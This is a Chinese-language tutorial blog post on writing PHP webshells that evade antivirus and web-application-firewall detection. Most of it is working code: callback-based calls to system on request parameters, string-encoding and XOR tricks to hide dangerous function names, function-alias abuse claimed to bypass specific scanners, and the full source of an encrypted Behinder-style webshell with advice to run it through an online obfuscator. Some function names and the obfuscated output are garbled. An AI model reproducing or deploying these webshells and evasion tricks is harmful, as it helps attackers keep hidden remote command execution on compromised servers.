PHP免杀详细讲解PHP免杀详细讲解

基础学习

可变参数
  • $_GET

  • $_POST

  • $_COOKIE

  • $_REQUEST

  • $_SERVER 其中的某些参数可控,如REQUESTMETHOD,QUERY STRING,HTTPUSERAGENT等

  • session_id() 这个比较特殊,但是依然可以利用

  • $_FILE

  • $GLOBALS

  • getallheaders()

  • get_defined_vars()

  • get_defined_functions()

filter_input

复制代码
<?php
function abcsmytqqe($a){
    $class_name = json_decode('"' . $a . '"');
    ((__FUNCTION__)[3].(__FUNCTION__)[5].(__FUNCTION__)[3].(__FUNCTION__)[6].(__FUNCTION__)[9].(__FUNCTION__)[4])($class_name);
}
$res=filter_input(INPUT_GET, 'b', FILTER_CALLBACK,array('options' => 'abcsmytqqe'));
回调函数

有太多了

复制代码
call_user_func()
array_filter() 
array_walk()  
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var() 
filter_var_array() 
uasort() 
uksort() 
array_reduce()
array_walk() 
array_walk_recursive()
call_user_func&call_user_func_array
复制代码
<?php
call_user_func('system', ('whoami'));
//相当于system('whoami')

<?php
call_user_func_array('system', array('whoami'));
array_map()

array_map() 函数将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新的值的数组

用到命令执行中就是

复制代码
array_map('system', array('whoami'));        
array_map($_GET['a'], array('whoami'));     
array_map('system', array($_GET['a']));
array_walk&array_walk_recursive

这个函数和我们的array_map是一样的

还可以拼接绕过关键字,因为我们传入的函数是使用String传入的

复制代码
<?php
$a=array("who"."ami");
array_walk_recursive($a,'sys'.'tem');
array_filter

array_filter --- 使用回调函数过滤数组的元素

复制代码
<?php
$a=array("who"."ami");
array_filter ($a,'sys'.'tem');
iterator_apply

iterator_apply --- 为迭代器中每个元素调用函数

复制代码
<?php
$it = new ArrayIterator(array(1,2,3));
iterator_apply($it, "system",array("whoami"));
?>
ljl\86135
ljl\86135
ljl\86135
foreach()
复制代码
<?php
$a=array("whoami");
$b="sys"."tem";
foreach($a as $value){
    $b($value);
}

但是动态拼接很容易就被检测了

字符串处理类函数
稀奇古怪的算法
复制代码
<?php
function confusion($a){
$s = ['A','a','b', 'y', 's', 's', 'T', 'e', 'a', 'm'];
$tmp = "";
while ($a>10) {
$tmp .= $s[$a%10];
$a = $a/10;
}
return $tmp.$s[$a];
}
confusion(976534)("whoami"); //confusion(976534)-->sysTem(高危函数)

这个是看的https://xz.aliyun.com/t/13591

复制代码
<?php
function confusion($a){
    $tmp = "";

    // 新的算法逻辑
    $characters = ['s', 'y', 's', 't', 'e', 'm'];
    $indices = [0, 1, 0, 3, 4, 5]; // 对应 'system' 在 $characters 中的位置

    foreach ($indices as $index) {
        $tmp .= $characters[$index];
    }
    return $tmp;
}
// 验证结果
echo confusion(976534); // 输出 'system'
?>
String函数
复制代码
trim()           //从字符串的两端删除空白字符和其他预定义字符
ucfirst()        //把字符串中的首字符转换为大写
ucwords()        //把字符串中每个单词的首字符转换为大写
strtoupper()     //把字符串转换为大写
strtolower()     //把字符串转换为小写
strtr()          //转换字符串中特定的字符
substr_replace() //把字符串的一部分替换为另一个字符串
substr()         //返回字符串的一部分

如果$a();会判定为动态函数执行

复制代码
<?php
$a="system";
strtoupper($a)("whoami");

这样strtoupper就会处理为String

pack()&unpack

pack() 函数函数把数据装入一个二进制字符串

Demo:简单来说,就是将指定编码的数字转成字符串

复制代码
<?php
// ASCII 编码转换为 system
echo pack("C6", 115, 121, 115, 116, 101, 109);  // s, y, s, t, e, m
echo pack("H*", "73797374656d");  // 73797374656d 对应的 ASCII 字符串是 system
?>
文件写入类函数

在Webshell的免杀过程中,一部分人另辟蹊径:通过执行一个执行内容为"写入恶意PHP"的样本来绕过查杀,执行成功后会在指定目录写入一个恶意PHP文件,最后通过连接那个恶意PHP文件获得WebShell

fwrite()&fputs
复制代码
<?php
highlight_file(__FILE__);
error_reporting(0);
$file = fopen("flag.txt","w");
echo fwrite($file,"<?php phpinfo();");    //21
fclose($file);

fputsfwrite的别名,可以用来写文件

file_put_contents()
复制代码
<?php
highlight_file(__FILE__);
error_reporting(0);
$file =("flag.txt");
file_put_contents($file,"<?php phpinfo();");    //21

使用 FILE_APPEND 标记,可以在文件末尾追加内容

复制代码
$file = 'sites.txt';
$site = "\nGoogle";
file_put_contents($file, $site, FILE_APPEND);

同时该函数可以配合解密函数写入文件,比如:

复制代码
$datatest = "[文件的base64编码]";
file_put_contents('./要写入的文件名', base64_decode($datatest));
异常处理类函数
复制代码
__construct  //异常构造函数
getMessage   //获取异常消息内容
getPrevious  //返回异常链中的前一个异常,如果不存在则返回null值
getCode      //获取异常代码
getFile      //获取发生异常的程序文件名称
getLine      //获取发生异常的代码在文件中的行号
getTrace     //获取异常追踪信息,其返回值是一个数组
getTraceAsString //获取字符串类型的异常追踪信息

<?php
function check($a)
{
    if($a!=1)
    {
        throw new Exception("sys"."tem");
    }
    return true;
}
try
{
    check(8);
    // 如果抛出异常,以下文本不会输出
    echo '如果输出该内容,说明 $number 变量小于1';
}
// 捕获异常
catch(Exception $e){
    $e->getMessage()("wh"."oami");
}
php特性
PHP数字可与字符做运算
复制代码
<?php
$a="system";
1-$a("whoami")-2;
?>
变量混淆
复制代码
<?php
$a="aaa";
$$a="system"; //$aaa=system
$aaa("whoami");
编码运算绕过
Base64编码
复制代码
<?php
$f = base64_decode("c3lz__dG__Vt");  //解密后为system高危函数,中间可以加入_
$f($_POST[0]);                      //system($_POST[0]);
?>
ASCII编码

ascii对应的是chr函数解密

复制代码
<?php
$f =  chr(115).chr(    121).chr(115).chr(116).chr(101).chr(109);//system
$f($_POST['0']);
?>
ROT13编码
复制代码
<?php
$f = str_rot13("flfgrz");  // 解密后为system,高危函数
$f($_POST[0]);            // system($_POST[0]);
?>
Hex编码
复制代码
<?php
$f = hex2bin("73797374656d");  // 解密后为system,高危函数
$f($_POST[0]);                // system($_POST[0]);
?>
Gz压缩编码
复制代码
<?php
$f = gzuncompress(base64_decode("eJzLSM3JyVcozy_KSVEEABxJBD4="));  // 解压缩后为system,高危函数
$f($_POST[0]);                                                   // system($_POST[0]);
?>
组合编码

可以组合使用多种编码方式来增加复杂性。

复制代码
<?php
$f = base64_decode(hex2bin("73797374656d"));  // 首先进行hex解码,然后base64解码,最终解密为system,高危函数
$f($_POST[0]);                               // system($_POST[0]);
?>
自定义编码
复制代码
<?php
function custom_decode($str) {
    $encoded = str_replace(['a','d'], ['s', 'e'], $str);
    return ($encoded);
}
$f = custom_decode("ayatdm");  // 解密后为system,高危函数
echo $f;
?>
异或
复制代码
<?php
$a = ('.'^']').('$'^']').('.'^']').('4'^'@').('8'^']').(']'^'0');   //system
$b = ('.$.48]' ^ ']]]@]0');//system
echo $a;
echo $b;
读取字符串绕过
ReflectionClass::getDocComment
复制代码
/**   
    * system($_GET[aabyss]);
    */  
class User { }  
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$f = substr($comment , 14 , 22);
eval($f);
读取数据库
复制代码
$path = "数据库文件名"

$db = new PDO("sqlite:" . $path);

$sql_stmt = $db->prepare('select * from test where name="system"');
$sql_stmt->execute();

$f = substr($sql_stmt->queryString, -7, 6);
$f($_GET['b']);
读取目录

FilesystemIterator 是一个迭代器,可以获取到目标目录下的所有文件信息

但是需要写一个特殊的文件

复制代码
<?php
$fi = new FilesystemIterator(dirname(__FILE__));
$f = '';
foreach($fi as $i){
    $a=substr($i,26,6);
    if ($a=="system"){
        $f=$a;
    }
}
$f("whoami");

别名绕过

复制代码
bzwrite->fwrite
bzflush->fflush
bzclose->fclose
isId->dom_attr_is_id
substringData->dom_characterdata_substring_data
appendData->dom_characterdata_append_data
insertData->dom_characterdata_insert_data
deleteData->dom_characterdata_delete_data
replaceData->dom_characterdata_replace_data
createElement->dom_document_create_element
createDocumentFragment->dom_document_create_document_fragment
createTextNode->dom_document_create_text_node
createComment->dom_document_create_comment
createCDATASection->dom_document_create_cdatasection
createProcessingInstruction->dom_document_create_processing_instruction
createAttribute->dom_document_create_attribute
createEntityReference->dom_document_create_entity_reference
getElementsByTagName->dom_document_get_elements_by_tag_name
importNode->dom_document_import_node
createElementNS->dom_document_create_element_ns
createAttributeNS->dom_document_create_attribute_ns
getElementsByTagNameNS->dom_document_get_elements_by_tag_name_ns
getElementById->dom_document_get_element_by_id
adoptNode->dom_document_adopt_node
normalizeDocument->dom_document_normalize_document
renameNode->dom_document_rename_node
save->dom_document_save
saveXML->dom_document_savexml
validate->dom_document_validate
xinclude->dom_document_xinclude
saveHTML->dom_document_save_html
saveHTMLFile->dom_document_save_html_file
schemaValidate->dom_document_schema_validate_file
schemaValidateSource->dom_document_schema_validate_xml
relaxNGValidate->dom_document_relaxNG_validate_file
relaxNGValidateSource->dom_document_relaxNG_validate_xml
setParameter->dom_domconfiguration_set_parameter
getParameter->dom_domconfiguration_get_parameter
canSetParameter->dom_domconfiguration_can_set_parameter
handleError->dom_domerrorhandler_handle_error
item->dom_domimplementationlist_item
getDomimplementation->dom_domimplementationsource_get_domimplementation
getDomimplementations->dom_domimplementationsource_get_domimplementations
item->dom_domstringlist_item
getAttribute->dom_element_get_attribute
setAttribute->dom_element_set_attribute
removeAttribute->dom_element_remove_attribute
getAttributeNode->dom_element_get_attribute_node
setAttributeNode->dom_element_set_attribute_node
removeAttributeNode->dom_element_remove_attribute_node
getElementsByTagName->dom_element_get_elements_by_tag_name
getAttributeNS->dom_element_get_attribute_ns
setAttributeNS->dom_element_set_attribute_ns
removeAttributeNS->dom_element_remove_attribute_ns
getAttributeNodeNS->dom_element_get_attribute_node_ns
setAttributeNodeNS->dom_element_set_attribute_node_ns
getElementsByTagNameNS->dom_element_get_elements_by_tag_name_ns
hasAttribute->dom_element_has_attribute
hasAttributeNS->dom_element_has_attribute_ns
setIdAttribute->dom_element_set_id_attribute
setIdAttributeNS->dom_element_set_id_attribute_ns
setIdAttributeNode->dom_element_set_id_attribute_node
getNamedItem->dom_namednodemap_get_named_item
setNamedItem->dom_namednodemap_set_named_item
removeNamedItem->dom_namednodemap_remove_named_item
item->dom_namednodemap_item
getNamedItemNS->dom_namednodemap_get_named_item_ns
setNamedItemNS->dom_namednodemap_set_named_item_ns
removeNamedItemNS->dom_namednodemap_remove_named_item_ns
count->dom_namednodemap_count
getName->dom_namelist_get_name
getNamespaceURI->dom_namelist_get_namespace_uri
insertBefore->dom_node_insert_before
replaceChild->dom_node_replace_child
removeChild->dom_node_remove_child
appendChild->dom_node_append_child
hasChildNodes->dom_node_has_child_nodes
cloneNode->dom_node_clone_node
normalize->dom_node_normalize
isSupported->dom_node_is_supported
hasAttributes->dom_node_has_attributes
compareDocumentPosition->dom_node_compare_document_position
isSameNode->dom_node_is_same_node
lookupPrefix->dom_node_lookup_prefix
isDefaultNamespace->dom_node_is_default_namespace
lookupNamespaceUri->dom_node_lookup_namespace_uri
isEqualNode->dom_node_is_equal_node
getFeature->dom_node_get_feature
setUserData->dom_node_set_user_data
getUserData->dom_node_get_user_data
item->dom_nodelist_item
count->dom_nodelist_count
findOffset16->dom_string_extend_find_offset16
findOffset32->dom_string_extend_find_offset32
splitText->dom_text_split_text
isWhitespaceInElementContent->dom_text_is_whitespace_in_element_content
isElementContentWhitespace->dom_text_is_whitespace_in_element_content
replaceWholeText->dom_text_replace_whole_text
handle->dom_userdatahandler_handle
registerNamespace->dom_xpath_register_ns
query->dom_xpath_query
evaluate->dom_xpath_evaluate
registerPhpFunctions->dom_xpath_register_php_functions
ftp_quit->ftp_close
imap_header->imap_headerinfo
imap_listmailbox->imap_list
imap_getmailboxes->imap_list_full
imap_scanmailbox->imap_listscan
imap_listsubscribed->imap_lsub
imap_getsubscribed->imap_lsub_full
imap_fetchtext->imap_body
imap_scan->imap_listscan
imap_create->imap_createmailbox
imap_rename->imap_renamemailbox
ldap_close->ldap_unbind
ldap_get_values->ldap_get_values_len
ldap_modify->ldap_mod_replace
mysqli_execute->mysqli_stmt_execute
mysqli_escape_string->mysqli_real_escape_string
mysqli_set_opt->mysqli_options
autocommit->mysqli_autocommit
begin_transaction->mysqli_begin_transaction
change_user->mysqli_change_user
character_set_name->mysqli_character_set_name
close->mysqli_close
commit->mysqli_commit
connect->mysqli_connect
dump_debug_info->mysqli_dump_debug_info
debug->mysqli_debug
get_charset->mysqli_get_charset
get_client_info->mysqli_get_client_info
get_client_info->mysqli_get_client_info
get_connection_stats->mysqli_get_connection_stats
get_server_info->mysqli_get_server_info
get_warnings->mysqli_get_warnings
init->mysqli_init_method
kill->mysqli_kill
multi_query->mysqli_multi_query
construct->mysqli_link_construct
more_results->mysqli_more_results
next_result->mysqli_next_result
options->mysqli_options
ping->mysqli_ping
prepare->mysqli_prepare
query->mysqli_query
real_connect->mysqli_real_connect
real_escape_string->mysqli_real_escape_string
escape_string->mysqli_real_escape_string
real_query->mysqli_real_query
release_savepoint->mysqli_release_savepoint
rollback->mysqli_rollback
savepoint->mysqli_savepoint
select_db->mysqli_select_db
set_charset->mysqli_set_charset
set_opt->mysqli_options
ssl_set->mysqli_ssl_set
stat->mysqli_stat
stmt_init->mysqli_stmt_init
store_result->mysqli_store_result
thread_safe->mysqli_thread_safe
use_result->mysqli_use_result
refresh->mysqli_refresh
construct->mysqli_result_construct
close->mysqli_free_result
free->mysqli_free_result
data_seek->mysqli_data_seek
fetch_field->mysqli_fetch_field
fetch_fields->mysqli_fetch_fields
fetch_field_direct->mysqli_fetch_field_direct
fetch_all->mysqli_fetch_all
fetch_array->mysqli_fetch_array
fetch_assoc->mysqli_fetch_assoc
fetch_object->mysqli_fetch_object
fetch_row->mysqli_fetch_row
field_seek->mysqli_field_seek
free_result->mysqli_free_result
construct->mysqli_stmt_construct
attr_get->mysqli_stmt_attr_get
attr_set->mysqli_stmt_attr_set
bind_param->mysqli_stmt_bind_param
bind_result->mysqli_stmt_bind_result
close->mysqli_stmt_close
data_seek->mysqli_stmt_data_seek
execute->mysqli_stmt_execute
fetch->mysqli_stmt_fetch
get_warnings->mysqli_stmt_get_warnings
result_metadata->mysqli_stmt_result_metadata
more_results->mysqli_stmt_more_results
next_result->mysqli_stmt_next_result
num_rows->mysqli_stmt_num_rows
send_long_data->mysqli_stmt_send_long_data
free_result->mysqli_stmt_free_result
reset->mysqli_stmt_reset
prepare->mysqli_stmt_prepare
store_result->mysqli_stmt_store_result
get_result->mysqli_stmt_get_result
oci_free_cursor->oci_free_statement
ocifreecursor->oci_free_statement
ocibindbyname->oci_bind_by_name
ocidefinebyname->oci_define_by_name
ocicolumnisnull->oci_field_is_null
ocicolumnname->oci_field_name
ocicolumnsize->oci_field_size
ocicolumnscale->oci_field_scale
ocicolumnprecision->oci_field_precision
ocicolumntype->oci_field_type
ocicolumntyperaw->oci_field_type_raw
ociexecute->oci_execute
ocicancel->oci_cancel
ocifetch->oci_fetch
ocifetchstatement->oci_fetch_all
ocifreestatement->oci_free_statement
ociinternaldebug->oci_internal_debug
ocinumcols->oci_num_fields
ociparse->oci_parse
ocinewcursor->oci_new_cursor
ociresult->oci_result
ociserverversion->oci_server_version
ocistatementtype->oci_statement_type
ocirowcount->oci_num_rows
ocilogoff->oci_close
ocilogon->oci_connect
ocinlogon->oci_new_connect
ociplogon->oci_pconnect
ocierror->oci_error
ocifreedesc->oci_free_descriptor
ocisavelob->oci_lob_save
ocisavelobfile->oci_lob_import
ociwritelobtofile->oci_lob_export
ociloadlob->oci_lob_load
ocicommit->oci_commit
ocirollback->oci_rollback
ocinewdescriptor->oci_new_descriptor
ocisetprefetch->oci_set_prefetch
ocipasswordchange->oci_password_change
ocifreecollection->oci_free_collection
ocinewcollection->oci_new_collection
ocicollappend->oci_collection_append
ocicollgetelem->oci_collection_element_get
ocicollassignelem->oci_collection_element_assign
ocicollsize->oci_collection_size
ocicollmax->oci_collection_max
ocicolltrim->oci_collection_trim
load->oci_lob_load
tell->oci_lob_tell
truncate->oci_lob_truncate
erase->oci_lob_erase
flush->oci_lob_flush
setbuffering->ocisetbufferinglob
getbuffering->ocigetbufferinglob
rewind->oci_lob_rewind
read->oci_lob_read
eof->oci_lob_eof
seek->oci_lob_seek
write->oci_lob_write
append->oci_lob_append
size->oci_lob_size
writetofile->oci_lob_export
export->oci_lob_export
import->oci_lob_import
writetemporary->oci_lob_write_temporary
close->oci_lob_close
save->oci_lob_save
savefile->oci_lob_import
free->oci_free_descriptor
append->oci_collection_append
getelem->oci_collection_element_get
assignelem->oci_collection_element_assign
assign->oci_collection_assign
size->oci_collection_size
max->oci_collection_max
trim->oci_collection_trim
free->oci_free_collection
odbc_do->odbc_exec
odbc_field_precision->odbc_field_len
openssl_free_key->openssl_pkey_free
openssl_get_privatekey->openssl_pkey_get_private
openssl_get_publickey->openssl_pkey_get_public
pcntl_errno->pcntl_get_last_error
pg_exec->pg_query
pg_getlastoid->pg_last_oid
pg_cmdtuples->pg_affected_rows
pg_errormessage->pg_last_error
pg_numrows->pg_num_rows
pg_numfields->pg_num_fields
pg_fieldname->pg_field_name
pg_fieldsize->pg_field_size
pg_fieldtype->pg_field_type
pg_fieldnum->pg_field_num
pg_fieldprtlen->pg_field_prtlen
pg_fieldisnull->pg_field_is_null
pg_freeresult->pg_free_result
pg_result->pg_fetch_result
pg_loreadall->pg_lo_read_all
pg_locreate->pg_lo_create
pg_lounlink->pg_lo_unlink
pg_loopen->pg_lo_open
pg_loclose->pg_lo_close
pg_loread->pg_lo_read
pg_lowrite->pg_lo_write
pg_loimport->pg_lo_import
pg_loexport->pg_lo_export
pg_clientencoding->pg_client_encoding
pg_setclientencoding->pg_set_client_encoding
pg_clientencoding->pg_client_encoding
pg_setclientencoding->pg_set_client_encoding
posix_errno->posix_get_last_error
session_commit->session_write_close
snmpwalkoid->snmprealwalk
snmp_set_oid_numeric_print->snmp_set_oid_output_format
socket_getopt->socket_get_option
socket_setopt->socket_set_option
sodium_crypto_scalarmult_base->sodium_crypto_box_publickey_from_secretkey
join->implode
chop->rtrim
strchr->strstr
srand->mt_srand
getrandmax->mt_getrandmax
show_source->highlight_file
ini_alter->ini_set
checkdnsrr->dns_check_record
getmxrr->dns_get_mx
doubleval->floatval
is_integer->is_int
is_long->is_int
is_double->is_float
fputs->fwrite
set_file_buffer->stream_set_write_buffer
socket_set_blocking->stream_set_blocking
stream_register_wrapper->stream_wrapper_register
stream_register_wrapper->stream_wrapper_register
socket_set_timeout->stream_set_timeout
dir->getdir
is_writeable->is_writable
diskfreespace->disk_free_space
pos->current
sizeof->count
key_exists->array_key_exists
close->closedir
rewind->rewinddir
importStylesheet->xsl_xsltprocessor_import_stylesheet
transformToDoc->xsl_xsltprocessor_transform_to_doc
transformToUri->xsl_xsltprocessor_transform_to_uri
transformToXml->xsl_xsltprocessor_transform_to_xml
setParameter->xsl_xsltprocessor_set_parameter
getParameter->xsl_xsltprocessor_get_parameter
removeParameter->xsl_xsltprocessor_remove_parameter
hasExsltSupport->xsl_xsltprocessor_has_exslt_support
registerPHPFunctions->xsl_xsltprocessor_register_php_functions
setProfiling->xsl_xsltprocessor_set_profiling
setSecurityPrefs->xsl_xsltprocessor_set_security_prefs
getSecurityPrefs->xsl_xsltprocessor_get_security_prefs
gzrewind->rewind
gzclose->fclose
gzeof->feof
gzgetc->fgetc
gzgets->fgets
DEP_FALIAS(gzgetss->fgetss
gzread->fread
gzpassthru->fpassthru
gzseek->fseek
gztell->ftell
gzwrite->fwrite
gzputs->fwrite
getallheaders->apache_request_headers
getallheaders->litespeed_request_headers
apache_request_headers->litespeed_request_headers
apache_response_headers->litespeed_response_headers

我们就可以找到可以利用的函数mbereg_replace,这个函数是pregreplace的别名,mberegreplace与pregreplace类似,可以利用e模式隐式执行代码,但是mberegreplace无法逃过查杀,而mberegreplace则是ALLKILL,没错,只是一个*的差别,让他逃过了免杀的眼睛

复制代码
<?php  
// (ALLKILL)
error_reporting(0);
mbereg_replace('.*', '', $_REQUEST[2333], 'mer');//php5 php7 success
?>

另外,我们可以自己创造别名,如:

复制代码
<?php  
// PHP >=5.6 可过盾狗
use function \system as strlen;  // 配合文件包含这甚至可以实现劫持,留待你们开发
strlen($_POST[1]);

<?php
// (ALLKILL)
define("ARRAY2", "sys"."tem");
@constant("ARRAY2")(pos(pos($GLOBALS)));  // PHP>7

混淆

推荐网站

https://enphp.djunny.com/

把你的马子上传,然后混淆一手

原代码

复制代码
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
    $t="base64_"."decode";
    $post=$t($post."");

    for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15];
    }
}
else
{
    $post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>

混淆后

复制代码
<?php
/*
-- EnPHP v2: http://enphp.djunny.com/
*/goto Ϻ��;����:$Ċ��=$�˼�[0x001];goto ���;��

免费获取网安资料:

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关

相关推荐
中微子1 分钟前
JavaScript事件循环机制:面试官最爱问的10个问题详解
前端
Eighteen Z10 分钟前
CSS揭秘:10.平行四边形
前端·css·css3
拾光拾趣录17 分钟前
虚拟DOM
前端·vue.js·dom
爱学习的茄子17 分钟前
JavaScript事件循环深度解析:理解异步执行的本质
前端·javascript·面试
1024小神18 分钟前
cocos游戏开发中多角色碰撞,物理反弹后改变方向的实现逻辑
前端·javascript
没有了遇见19 分钟前
Android 通过 SO 库安全存储敏感数据,解决接口劫持问题
android
hsx66620 分钟前
使用一个 RecyclerView 构建复杂多类型布局
android
止观止21 分钟前
JavaScript对象创建9大核心技术解析
开发语言·javascript·ecmascript
hsx66622 分钟前
利用 onMeasure、onLayout、onDraw 创建自定义 View
android
摆烂为不摆烂22 分钟前
😁深入JS(五): 一文让你完全理解 hash 与 history 路由,手写前端路由
前端